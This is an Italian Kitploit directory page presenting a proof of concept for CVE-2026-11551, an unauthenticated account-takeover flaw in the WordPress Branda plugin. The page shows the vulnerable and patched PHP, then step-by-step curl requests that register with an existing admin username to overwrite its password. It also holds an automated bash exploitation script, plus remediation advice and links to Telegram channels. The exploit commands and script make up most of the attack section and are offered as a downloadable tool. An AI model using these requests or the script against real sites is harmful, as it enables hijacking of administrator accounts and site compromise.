Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-..CVE-2026-11551-PoC — Unauthenticated Privilege Escalation via Account Takeover | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Unauthenticated Privilege Escalation via Account Takeover

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
12 mesi faNon ancora revisionato

CVE-2026-11551: Plugin Branda - Escalation dei privilegi non autenticata tramite account takeover

Panoramica

  • ID CVE: CVE-2026-11551
  • Punteggio CVSS: 9.8 (Critico)
  • Versioni interessate: Branda – White Label & Branding <= 3.4.29
  • Versione corretta: 3.4.31
  • Pubblicata: 19 giugno 2026

Descrizione della vulnerabilità

Il plugin Branda per WordPress è vulnerabile all'escalation dei privilegi tramite account takeover in tutte le versioni fino alla 3.4.29 inclusa. Ciò è dovuto al fatto che il plugin non valida correttamente l'identità di un utente prima di aggiornarne la password. Questo consente ad attaccanti non autenticati di modificare le password di utenti arbitrari, inclusi gli amministratori, e di sfruttare questa possibilità per ottenere l'accesso ai loro account.

Analisi tecnica

Posizione del codice vulnerabile

/inc/modules/login-screen/signup-password.php

Causa principale

La funzione pre_insert_user_data() nella versione vulnerabile non esegue una corretta validazione:

root@kitploit:~
// Vulnerable version (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code...
    }
    // Missing: if ($update) return $data; <-- VULNERABILITY
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Set the password from POST data
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Codice corretto (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code with proper checks...
    }

    // FIX: Added check to prevent updating existing users
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Vettori di attacco

Vettore 1: Registrazione Multisite (principale)

  1. L'attaccante accede a /wp-signup.php
  2. Si registra con un nome utente admin esistente (es. "admin")
  3. Imposta una password personalizzata tramite il parametro password_1
  4. Branda memorizza la password nei metadati della registrazione
  5. All'attivazione, la password sovrascrive quella dell'admin esistente

Vettore 2: Registrazione su sito singolo

  1. L'attaccante accede a /wp-login.php?action=register
  2. Branda aggiunge i campi password al modulo
  3. L'attaccante invia la registrazione con un nome utente esistente
  4. Se l'attivazione viene completata, la password viene impostata

Proof of Concept (curl)

Passo 1: Verifica se la registrazione è abilitata

root@kitploit:~
curl -s -k "https://TARGET/wp-login.php?action=register" | grep -i "registration"

Passo 2: Verifica il tipo di WordPress (Multisite o singolo)

root@kitploit:~
curl -s -k -I "https://TARGET/wp-signup.php" | grep "HTTP/"

Passo 3: Per Multisite - Registrati con il nome utente admin

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

Passo 4: Per sito singolo - Registrati

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

Passo 5: Attiva (se richiesta la verifica via email)

root@kitploit:~
# Extract activation key from email and visit:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://TARGET/wp-activate.php?key=ACTIVATION_KEY"

Passo 6: Verifica - Prova ad accedere

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

Script di sfruttamento automatizzato

root@kitploit:~
#!/bin/bash
TARGET="https://TARGET"
USERNAME="admin"
NEW_PASSWORD="Pwned$(date +%s)!"

echo "[*] Registering $USERNAME with password $NEW_PASSWORD..."

# Multisite attack
curl -s -k -c /tmp/cookies.txt \
  -X POST "$TARGET/wp-signup.php" \
  -d "user_name=$USERNAME" \
  -d "[email protected]" \
  -d "password_1=$NEW_PASSWORD" \
  -d "password_2=$NEW_PASSWORD"

echo "[*] Check email for activation link"
echo "[*] After activation, try: curl -X POST $TARGET/wp-login.php -d 'log=$USERNAME' -d 'pwd=$NEW_PASSWORD'"

Requisiti per lo sfruttamento

  1. WordPress con il plugin Branda <= 3.4.29 installato e attivato
  2. La registrazione utente deve essere abilitata (controlla Impostazioni > Generali > Iscrizione: Chiunque può registrarsi)
  3. Per un account takeover riuscito: il nome utente target deve esistere
  4. Per Multisite: accesso all'email di attivazione (o bypass dell'attivazione)

Rimedio

Aggiorna il plugin Branda alla versione 3.4.31 o successiva:

root@kitploit:~
# Via WordPress Admin
Dashboard > Plugins > Branda > Update

# Via WP-CLI
wp plugin update branda-white-labeling

# Via SSH
wp plugin update branda-white-labeling --version=3.4.31

Impatto

  • Riservatezza: Alta - L'attaccante ottiene l'accesso a qualsiasi account utente
  • Integrità: Alta - L'attaccante può modificare i contenuti
  • Disponibilità: Alta - L'attaccante può bloccare gli utenti legittimi

Riferimenti

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • Canale Telegram W.P.E.F #1
  • Canale Telegram W.P.E.F #2
Scarica lo strumento